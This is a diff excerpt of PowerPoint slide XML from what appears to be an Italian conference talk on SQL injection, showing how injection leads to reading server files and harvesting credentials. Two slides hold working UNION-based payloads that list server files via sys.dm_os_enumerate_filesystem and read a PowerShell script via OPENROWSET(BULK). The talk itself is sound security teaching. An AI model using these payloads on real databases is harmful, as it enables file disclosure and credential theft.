+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03CD8391-B464-B5CF-9082-3CF6D13A161C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Elencare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> file </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>sul</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> server**</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E38738-BFC1-146C-0375-484E39C4EBCF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB365B2-F282-A8A3-B267-19E743A8717F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>full_filesystem_path</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, NULL, NULL, NULL, NULL FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>sys.dm_os_enumerate_filesystem</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>('c:\temp\Customer','*.ps1') ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3999078345"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18FD7FC-B8B1-4CB8-73E1-C7086085F720}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57D50E93-7CD7-0D77-FD5A-1339293B60E3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Recuperare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> il </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>contenuto</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> di un file </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>sul</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> server**</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87373525-BD8B-F495-EE5A-BB95CF88A8D7}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{455AE3D5-D1BE-3259-AE95-98CB53EA6AC3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>BulkColumn</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, NULL, NULL, NULL, NULL FROM OPENROWSET(BULK </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>N'c</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>:\temp\Customer\AzCopyFromCustomerSAS.ps1', SINGLE_CLOB) AS Contents ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="561175873"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3FD5820-3FD0-9838-1C86-2B2098571FEF}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6F43C7-FDD5-D10F-AC8F-9CF052EC9873}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Estrarre</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> le </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>credenziali</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> in </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>chiaro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> da uno script</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9804557-1CD6-10FF-47A5-107CBC090365}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="A pair of handcuffs on a black background&#10;&#10;AI-generated content may be incorrect.">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18912161-9C4B-91DC-0973-35DD06817AE0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3580702" y="2199023"/>
+            <a:ext cx="1982595" cy="1982595"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1428614124"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide34.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC4F3D9-4C60-3D2D-5635-53F8E82B872A}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049DB303-33EA-2975-5CBD-8F7C630A93B0}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
